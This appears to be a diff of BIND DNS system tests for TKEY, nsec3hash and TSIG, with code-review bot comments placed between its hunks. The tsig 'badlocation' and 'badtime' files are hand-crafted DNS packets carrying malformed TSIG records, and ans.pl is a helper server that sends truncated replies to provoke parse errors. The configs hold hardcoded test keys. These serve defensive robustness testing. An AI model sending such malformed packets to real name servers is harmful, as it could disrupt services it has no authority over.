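Review bot: In recvquery() of keydelete.c the result of dns_tkey_processdeleteresponse() is checked under the label "dns_tkey_processdhresponse", so a failed delete is reported under the name of a function this tool never calls. The label should match the call, `CHECK("dns_tkey_processdeleteresponse", result);`, otherwise a failing TKEY-delete test points the reader at the Diffie-Hellman exchange instead of the delete path. The usage message in main() also reads "The -r options has been deprecated"; `"I:the -r option has been deprecated\n"` would match the wording used by the preceding file in this diff.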
@@ -0,0 +1,49 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port 5300; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify no; + tkey-domain "server"; + tkey-dhkey "server" KEYID; + allow-query-cache { any; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port 9953 allow { any; } keys { rndc_key; }; +}; + +key "tkeytest." { + algorithm hmac-md5; + secret "0123456789ab"; +}; + +zone example { + type primary; + file "example.db"; + allow-query { key tkeytest.; none; }; +}; diff --git a/bin/tests/system/tkey/ns1/setup.sh b/bin/tests/system/tkey/ns1/setup.sh new file mode 100644 index 0000000..6471905 --- /dev/null +++ b/bin/tests/system/tkey/ns1/setup.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +keyname=`$KEYGEN -T KEY -a DH -b 768 -n host server` +keyid=$(keyfile_to_key_id $keyname) +rm -f named.conf +sed -e "s;KEYID;$keyid;" < named.conf.in > named.conf 
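Review bot: The `key "tkeytest."` block in tkey/ns1/named.conf.in uses `algorithm hmac-md5;` unconditionally, and keydelete.c hard-codes `DNS_TSIG_HMACMD5_NAME`, while the tsig test in this same diff appends its md5 keys only when `$FEATURETEST --md5` succeeds. On a build without MD5 support the tkey test would presumably fail at configuration load or key creation rather than be skipped. If the tkey directory does not already gate on this elsewhere, a prereq.sh modelled on tsig/prereq.sh with `$FEATURETEST --md5 || { echo_i "This test requires MD5 support." >&2; exit 1; }` would make the dependency explicit. The file also carries two `controls` statements, an empty one at the top and the `inet 10.53.0.1 port 9953` one further down; a comment saying which is meant to take effect, or dropping the empty one, would remove the ambiguity.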
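Review bot: The `$KEYGEN` call in tkey/ns1/setup.sh is not checked, so when key generation fails `keyid` ends up empty and the sed step still writes a named.conf whose `tkey-dhkey "server"` line has a blank key id. Failing early keeps the error next to its cause: `keyname=$($KEYGEN -T KEY -a DH -b 768 -n host server) || exit 1`. Quoting the argument as `keyid=$(keyfile_to_key_id "$keyname")` also avoids word splitting on an unexpected value.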
diff --git a/bin/tests/system/tkey/setup.sh b/bin/tests/system/tkey/setup.sh new file mode 100644 index 0000000..68a50ad --- /dev/null +++ b/bin/tests/system/tkey/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +cd ns1 && $SHELL setup.sh diff --git a/bin/tests/system/tkey/tests.sh b/bin/tests/system/tkey/tests.sh new file mode 100644 index 0000000..ca466e4 --- /dev/null +++ b/bin/tests/system/tkey/tests.sh 
@@ -0,0 +1,160 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="@10.53.0.1 -p 5300" + +status=0 +n=1 + +echo_i "generating new DH key ($n)" +ret=0 +dhkeyname=`$KEYGEN -T KEY -a DH -b 768 -n host client` || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" + status=$((status+ret)) + echo_i "exit status: $status" + exit $status +fi +status=`expr $status + $ret` +n=$((n+1)) + +for owner in . foo.example. +do + echo_i "creating new key using owner name \"$owner\" ($n)" + ret=0 + keyname=`$KEYCREATE $dhkeyname $owner` || ret=1 + if [ $ret != 0 ]; then + echo_i "failed" + status=$((status+ret)) + echo_i "exit status: $status" + exit $status + fi + status=`expr $status + $ret` + n=$((n+1)) + + echo_i "checking the new key ($n)" + ret=0 + $DIG $DIGOPTS txt txt.example -k $keyname > dig.out.1 || ret=1 + grep "status: NOERROR" dig.out.1 > /dev/null || ret=1 + grep "TSIG.*hmac-md5.*NOERROR" dig.out.1 > /dev/null || ret=1 + grep "Some TSIG could not be validated" dig.out.1 > /dev/null && ret=1 + if [ $ret != 0 ]; then + echo_i "failed" + fi + status=`expr $status + $ret` + n=$((n+1)) + + echo_i "deleting new key ($n)" + ret=0 + $KEYDELETE $keyname || ret=1 + if [ $ret != 0 ]; then + echo_i "failed" + fi + status=`expr $status + $ret` + n=$((n+1)) + + echo_i "checking that new key has been deleted ($n)" + ret=0 + $DIG $DIGOPTS txt txt.example -k $keyname > dig.out.2 || ret=1 + grep "status: NOERROR" dig.out.2 > /dev/null && ret=1 + grep "TSIG.*hmac-md5.*NOERROR" dig.out.2 > /dev/null && ret=1 + grep "Some TSIG could not be validated" 
dig.out.2 > /dev/null || ret=1 + if [ $ret != 0 ]; then + echo_i "failed" + fi + status=`expr $status + $ret` + n=$((n+1)) +done + +echo_i "creating new key using owner name bar.example. ($n)" +ret=0 +keyname=`$KEYCREATE $dhkeyname bar.example.` || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" + status=$((status+ret)) + echo_i "exit status: $status" + exit $status +fi +status=`expr $status + $ret` +n=$((n+1)) + +echo_i "checking the key with 'rndc tsig-list' ($n)" +ret=0 +$RNDC -c ../common/rndc.conf -s 10.53.0.1 -p 9953 tsig-list > rndc.out.1 +grep "key \"bar.example.server" rndc.out.1 > /dev/null || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" +fi +status=`expr $status + $ret` +n=$((n+1)) + +echo_i "using key in a request ($n)" +ret=0 +$DIG $DIGOPTS -k $keyname txt.example txt > dig.out.3 || ret=1 +grep "status: NOERROR" dig.out.3 > /dev/null || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" +fi +status=`expr $status + $ret` +n=$((n+1)) + +echo_i "deleting the key with 'rndc tsig-delete' ($n)" +ret=0 +$RNDC -c ../common/rndc.conf -s 10.53.0.1 -p 9953 tsig-delete bar.example.server > /dev/null || ret=1 +$RNDC -c ../common/rndc.conf -s 10.53.0.1 -p 9953 tsig-list > rndc.out.2 +grep "key \"bar.example.server" rndc.out.2 > /dev/null && ret=1 +$DIG $DIGOPTS -k $keyname txt.example txt > dig.out.4 || ret=1 +grep "TSIG could not be validated" dig.out.4 > /dev/null || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" +fi +status=`expr $status + $ret` +n=$((n+1)) + +echo_i "recreating the bar.example. 
key ($n)" +ret=0 +keyname=`$KEYCREATE $dhkeyname bar.example.` || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" + status=$((status+ret)) + echo_i "exit status: $status" + exit $status +fi +status=`expr $status + $ret` +n=$((n+1)) + +echo_i "checking the new key with 'rndc tsig-list' ($n)" +ret=0 +$RNDC -c ../common/rndc.conf -s 10.53.0.1 -p 9953 tsig-list > rndc.out.3 +grep "key \"bar.example.server" rndc.out.3 > /dev/null || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" +fi +status=`expr $status + $ret` +n=$((n+1)) + +echo_i "using the new key in a request ($n)" +ret=0 +$DIG $DIGOPTS -k $keyname txt.example txt > dig.out.5 || ret=1 +grep "status: NOERROR" dig.out.5 > /dev/null || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" +fi +status=`expr $status + $ret` +n=$((n+1)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/tools/clean.sh b/bin/tests/system/tools/clean.sh new file mode 100644 index 0000000..32a8e97 --- /dev/null +++ b/bin/tests/system/tools/clean.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f NSEC3 +rm -f nsec3hash +rm -f nsec3param +rm -f testcases diff --git a/bin/tests/system/tools/setup.sh b/bin/tests/system/tools/setup.sh new file mode 100644 index 0000000..913e217 --- /dev/null +++ b/bin/tests/system/tools/setup.sh 
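Review bot: In the "deleting the key with 'rndc tsig-delete'" step of tkey/tests.sh the `$RNDC ... tsig-list > rndc.out.2` line has no `|| ret=1`, and the following `grep ... rndc.out.2 > /dev/null && ret=1` fails only when the key is still listed, so an rndc failure that leaves rndc.out.2 empty is counted as "key deleted". Appending `|| ret=1` to that tsig-list line makes the negative check depend on a successful listing; the dig check that follows covers the query path but not a broken control channel. The other two tsig-list calls (rndc.out.1, rndc.out.3) are covered by their positive grep, though adding `|| ret=1` there as well would keep the three steps uniform. The script also mixes the `expr` form and the `$((status+ret))` form for the same counter; one form throughout would read better.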
@@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +$SHELL clean.sh diff --git a/bin/tests/system/tools/tests.sh b/bin/tests/system/tools/tests.sh new file mode 100644 index 0000000..4ce73e1 --- /dev/null +++ b/bin/tests/system/tools/tests.sh 
@@ -0,0 +1,105 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 + +checkout() { + case $? in + 0) : ok ;; + *) echo_i "failed" + status=`expr $status + 1` + return 1 ;; + esac + case $out in + *$hash*) : ok ;; + *) echo_i "expect $hash" + echo_i "output $out" + echo_i "failed" + status=`expr $status + 1` ;; + esac +} + +# test cases taken from RFC 5155 appendix A +algo=1 flags=0 iters=12 salt="aabbccdd" +while read name hash +do + echo_i "checking $NSEC3HASH $name" + out=`$NSEC3HASH $salt $algo $iters $name` + checkout + + echo_i "checking $NSEC3HASH -r $name" + out=`$NSEC3HASH -r $algo $flags $iters $salt $name` + checkout + +done <<EOF +*.w.example R53BQ7CC2UVMUBFU5OCMM6PERS9TK9EN +2t7b4g4vsa5smi47k61mv5bv1a22bojr.example KOHAR7MBB8DC2CE8A9QVL8HON4K53UHI +a.example 35MTHGPGCU1QG68FAB165KLNSNK3DPVL +ai.example GJEQE526PLBF1G8MKLP59ENFD789NJGI +example 0P9MHAVEQVM6T7VBL5LOP2U3T2RP3TOM +ns1.example 2T7B4G4VSA5SMI47K61MV5BV1A22BOJR +ns2.example Q04JKCEVQVMU85R014C7DKBA38O0JI5R +w.example K8UDEMVP1J2F7EG6JEBPS17VP3N8I58H +x.w.example B4UM86EGHHDS6NEA196SMVMLO4ORS995 +x.y.w.example 2VPTU5TIMAMQTTGL4LUU9KG21E0AOR3S +xx.example T644EBQK9BIBCNA874GIVR6JOJ62MLHV +y.w.example JI6NEOAEPV8B5O6K4EV33ABHA8HT9FGC +EOF + +# test empty salt +checkempty() { + hash=CK0POJMG874LJREF7EFN8430QVIT8BSM checkout && + hash=- checkout +} +name=com algo=1 flags=1 iters=0 +echo_i "checking $NSEC3HASH '' $name" +out=`$NSEC3HASH '' $algo $iters $name` +checkempty +echo_i "checking $NSEC3HASH - $name" +out=`$NSEC3HASH - $algo $iters $name` +checkempty 
+echo_i "checking $NSEC3HASH -- '' $name" +out=`$NSEC3HASH -- '' $algo $iters $name` +checkempty +echo_i "checking $NSEC3HASH -- - $name" +out=`$NSEC3HASH -- - $algo $iters $name` +checkempty +echo_i "checking $NSEC3HASH -r '' $name" +out=`$NSEC3HASH -r $algo $flags $iters '' $name` +checkempty +echo_i "checking $NSEC3HASH -r - $name" +out=`$NSEC3HASH -r $algo $flags $iters - $name` +checkempty + +checkfail() { + case $? in + 0) echo_i "failed to fail" + status=`expr $status + 1` + return 1 ;; + esac +} +echo_i "checking $NSEC3HASH missing args" +out=`$NSEC3HASH 00 1 0 2>&1` +checkfail +echo_i "checking $NSEC3HASH extra args" +out=`$NSEC3HASH 00 1 0 two names 2>&1` +checkfail +echo_i "checking $NSEC3HASH bad option" +out=`$NSEC3HASH -? 2>&1` +checkfail + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/tsig/ans2/ans.pl b/bin/tests/system/tsig/ans2/ans.pl new file mode 100644 index 0000000..09ab29b --- /dev/null +++ b/bin/tests/system/tsig/ans2/ans.pl 
@@ -0,0 +1,52 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# An adhoc server that returns a TC=1 response with the final byte +# removed to generate UNEXPECTEDEND form dns_message_parse. +# + +use IO::File; +use IO::Socket; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } +printf "localport %u\n", $localport; + +my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.2", + LocalPort => $localport, Proto => "udp") or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +sub arraystring { + my $string = join("", @_); + return $string; +} + +for (;;) { + $from = $sock->recv($buf, 512); + ($port, $ip_address) = unpack_sockaddr_in($from); + $l = length($buf); + printf "received %u bytes from %s#%u\n", $l, inet_ntoa($ip_address), $port; + @up = unpack("C[$l]", $buf); + $up[2] |= 0x80; # QR + $up[2] |= 0x02; # TC + $up[3] |= 0x80; # RA + $l -= 1; # truncate the response 1 byte + $replydata = pack("C[$l]", @up); + printf "sent %u bytes\n", $sock->send($replydata); +} diff --git a/bin/tests/system/tsig/badlocation b/bin/tests/system/tsig/badlocation new file mode 100644 index 0000000..4477423 --- /dev/null +++ b/bin/tests/system/tsig/badlocation 
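Review bot: The receive loop in ans.pl uses `$from` and `$buf` without checking them, so a failed `recv` reaches `unpack_sockaddr_in` with an undefined value, and a zero-length datagram makes `$l -= 1` negative before `pack("C[$l]", @up)`, which would likely end the helper. A guard at the top of the loop, `next if !defined($from) || length($buf) < 12;`, skips anything shorter than a DNS header and keeps the server alive for the rest of the test run. The script has no `use strict; use warnings;` and the loop variables are undeclared globals; they would need `my` declarations if strict is turned on.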
@@ -0,0 +1,37 @@ +# Transaction ID +1122 +# Standard query +0000 +# Questions: 1, Additional: 1 +0001 0000 0001 0000 +# QNAME: isc.org +03 69 73 63 03 6F 72 67 00 +# Type: A (Host Address) +0001 +# Class: IN +0001 +# Specially crafted TSIG Resource Record +# Name: "sha256" +06 73 68 61 32 35 36 00 +# Type: TSIG (Transaction Signature) +00fa +# Class: ANY +00ff +# TTL: 0 +00000000 +# RdLen: 29 +001d +# Algorithm Name: hmac-sha256 +0b 68 6D 61 63 2D 73 68 61 32 35 36 00 +# Time Signed: Jan 1, 1970 01:00:00.000000000 CET +00 00 00 00 00 00 +# Fudge: 300 +012c +# MAC Size: 0; MAC: empty +0000 +# Original ID: 0 +0000 +# Error: no error +0000 +# Other Data Length: 0 +0000 diff --git a/bin/tests/system/tsig/badtime b/bin/tests/system/tsig/badtime new file mode 100644 index 0000000..7926404 --- /dev/null +++ b/bin/tests/system/tsig/badtime @@ -0,0 +1,37 @@ +# Transaction ID +1122 +# Standard query +0000 +# Questions: 1, Additional: 1 +0001 0000 0000 0001 +# QNAME: isc.org +03 69 73 63 03 6F 72 67 00 +# Type: A (Host Address) +0001 +# Class: IN +0001 +# Specially crafted TSIG Resource Record +# Name: "sha256" +06 73 68 61 32 35 36 00 +# Type: TSIG (Transaction Signature) +00fa +# Class: ANY +00ff +# TTL: 0 +00000000 +# RdLen: 29 +001d +# Algorithm Name: hmac-sha256 +0b 68 6D 61 63 2D 73 68 61 32 35 36 00 +# Time Signed: Jan 1, 1970 01:00:00.000000000 CET +00 00 00 00 00 00 +# Fudge: 300 +012c +# MAC Size: 0; MAC: empty +0000 +# Original ID: 0 +0000 +# Error: BADSIG +0010 +# Other Data Length: 0 +0000 diff --git a/bin/tests/system/tsig/clean.sh b/bin/tests/system/tsig/clean.sh new file mode 100644 index 0000000..b173ffe --- /dev/null +++ b/bin/tests/system/tsig/clean.sh 
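Review bot: The header comment in tsig/badlocation says "Questions: 1, Additional: 1", but the bytes under it are `0001 0000 0001 0000`, which in DNS header order is QDCOUNT=1, ANCOUNT=0, NSCOUNT=1, ARCOUNT=0. Going by the file name the TSIG record is placed in the authority section on purpose, so the comment should say so, for example `# Questions: 1, Authority: 1 (TSIG deliberately outside the additional section)`. The sibling badtime file uses `0001 0000 0000 0001`, where the same comment is accurate.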
@@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after tsig tests. +# + +rm -f dig.out.* +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f ns*/named.lock +rm -f Kexample.net.* +rm -f keygen.out? +rm -f ns*/managed-keys.bind* +rm -f packet.out diff --git a/bin/tests/system/tsig/ns1/example.db b/bin/tests/system/tsig/ns1/example.db new file mode 100644 index 0000000..7854613 --- /dev/null +++ b/bin/tests/system/tsig/ns1/example.db 
@@ -0,0 +1,163 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example.nil IN SOA ns1.example.nil. hostmaster.example.nil. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example.nil. NS ns1.example.nil. +ns1.example.nil. A 10.53.0.1 +example.nil. NS ns2.example.nil. +ns2.example.nil. A 10.53.0.2 + +$ORIGIN example.nil. +* MX 10 mail +a TXT "foo foo foo" + PTR foo.net. +$TTL 3600 ; 1 hour +a01 A 0.0.0.0 +a02 A 255.255.255.255 +a601 AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . +$TTL 300 ; 5 minutes +b CNAME foo.net. +c A 73.80.65.49 +$TTL 3600 ; 1 hour +cert01 CERT 65534 65535 PRIVATEOID ( + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . +$TTL 300 ; 5 minutes +d A 73.80.65.49 +$TTL 3600 ; 1 hour +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . 
+$TTL 300 ; 5 minutes +e MX 10 mail + TXT "one" + TXT "three" + TXT "two" + A 73.80.65.49 + A 73.80.65.50 + A 73.80.65.52 + A 73.80.65.51 +f A 73.80.65.52 +$TTL 3600 ; 1 hour +gpos01 GPOS "-22.6882" "116.8652" "250.0" +gpos02 GPOS "" "" "" +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO "PC" "NetBSD" +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN "isdn-address" +isdn04 ISDN "isdn-address" "subaddress" +key01 KEY 512 255 1 ( + AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aR + yzWZriO6i2odGWWQVucZqKVsENW91IOW4vqudngPZsY3 + GvQ/xVA8/7pyFj6b7Esga60zyGW6LFe9r8n6paHrlG5o + jqf0BaqHT+8= ) +kx01 KX 10 kdc +kx02 KX 10 . +loc01 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01 MG madname +mb02 MG . +mg01 MG mgmname +mg02 MG . +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . +mr01 MR mrname +mr02 MR . +mx01 MX 10 mail +mx02 MX 10 . +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 "blurgh" "blorf" ":(.*):\\1:" foo. +nsap-ptr01 NSAP-PTR foo. + NSAP-PTR . +nsap01 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02 NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01 NXT a.secure ( NS SOA MX SIG KEY LOC NXT ) +nxt02 NXT . ( NSAP-PTR NXT ) +nxt03 NXT . ( A ) +nxt04 NXT . ( 127 ) +ptr01 PTR example.nil. +px01 PX 65535 foo. bar. +px02 PX 65535 . . +rp01 RP mbox-dname txt-dname +rp02 RP . . +rt01 RT 0 intermediate-host +rt02 RT 65535 . +$TTL 300 ; 5 minutes +s NS ns.s +$ORIGIN s.example.nil. +ns A 73.80.65.49 +$ORIGIN example.nil. +$TTL 3600 ; 1 hour +sig01 SIG NXT 1 3 3600 20000102030405 ( + 19961211100908 2143 foo + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +srv01 SRV 0 0 0 . +srv02 SRV 65535 65535 65535 old-slow-box.example.com. 
+$TTL 301 ; 5 minutes 1 second +t A 73.80.65.49 +$TTL 3600 ; 1 hour +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT "foo" +txt04 TXT "foo" "bar" +txt05 TXT "foo bar" +txt06 TXT "foo bar" +txt07 TXT "foo bar" +txt08 TXT "foo\010bar" +txt09 TXT "foo\010bar" +txt10 TXT "foo bar" +txt11 TXT "\"foo\"" +txt12 TXT "\"foo\"" +$TTL 300 ; 5 minutes +u TXT "txt-not-in-nxt" +$ORIGIN u.example.nil. +a A 73.80.65.49 +b A 73.80.65.49 +$ORIGIN example.nil. +$TTL 3600 ; 1 hour +wks01 WKS 10.0.0.1 6 ( 0 1 2 21 23 ) +wks02 WKS 10.0.0.1 17 ( 0 1 2 53 ) +wks03 WKS 10.0.0.2 6 ( 65535 ) +x2501 X25 "123456789" +large TXT ( 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 ) diff --git a/bin/tests/system/tsig/ns1/named.conf.in b/bin/tests/system/tsig/ns1/named.conf.in new file mode 100644 index 0000000..22637af --- /dev/null +++ b/bin/tests/system/tsig/ns1/named.conf.in 
@@ -0,0 +1,93 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + notify no; +}; + +# md5 key appended by setup.sh at the end + +key "sha1" { + secret "FrSt77yPTFx6hTs4i2tKLB9LmE0="; + algorithm hmac-sha1; +}; + +key "sha224" { + secret "hXfwwwiag2QGqblopofai9NuW28q/1rH4CaTnA=="; + algorithm hmac-sha224; +}; + +key "sha256" { + secret "R16NojROxtxH/xbDl//ehDsHm5DjWTQ2YXV+hGC2iBY="; + algorithm hmac-sha256; +}; + +key "sha384" { + secret "OaDdoAk2LAcLtYeUnsT7A9XHjsb6ZEma7OCvUpMraQIJX6HetGrlKmF7yglO1G2h"; + algorithm hmac-sha384; +}; + +key "sha512" { + secret "jI/Pa4qRu96t76Pns5Z/Ndxbn3QCkwcxLOgt9vgvnJw5wqTRvNyk3FtD6yIMd1dWVlqZ+Y4fe6Uasc0ckctEmg=="; + algorithm hmac-sha512; +}; + +# md5-trunc key appended by setup.sh at the end + +key "sha1-trunc" { + secret "FrSt77yPTFx6hTs4i2tKLB9LmE0="; + algorithm hmac-sha1-80; +}; + +key "sha224-trunc" { + secret "hXfwwwiag2QGqblopofai9NuW28q/1rH4CaTnA=="; + algorithm hmac-sha224-112; +}; + +key "sha256-trunc" { + secret "R16NojROxtxH/xbDl//ehDsHm5DjWTQ2YXV+hGC2iBY="; + algorithm hmac-sha256-128; +}; + +key "sha384-trunc" { + secret "OaDdoAk2LAcLtYeUnsT7A9XHjsb6ZEma7OCvUpMraQIJX6HetGrlKmF7yglO1G2h"; + algorithm hmac-sha384-192; +}; + +key "sha512-trunc" { + secret "jI/Pa4qRu96t76Pns5Z/Ndxbn3QCkwcxLOgt9vgvnJw5wqTRvNyk3FtD6yIMd1dWVlqZ+Y4fe6Uasc0ckctEmg=="; + algorithm hmac-sha512-256; +}; + +zone "example.nil" { + type primary; + file 
"example.db"; +}; + +server 10.53.0.2 { + keys sha256; +}; + +zone "bad-tsig" { + type forward; + forwarders { 10.53.0.2; }; + forward only; +}; diff --git a/bin/tests/system/tsig/prereq.sh b/bin/tests/system/tsig/prereq.sh new file mode 100644 index 0000000..a663cfe --- /dev/null +++ b/bin/tests/system/tsig/prereq.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +if test -z "$PERL"; then + echo_i "This test requires Perl." >&2 + exit 1 +fi + +exit 0 diff --git a/bin/tests/system/tsig/setup.sh b/bin/tests/system/tsig/setup.sh new file mode 100644 index 0000000..420e513 --- /dev/null +++ b/bin/tests/system/tsig/setup.sh @@ -0,0 +1,35 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + 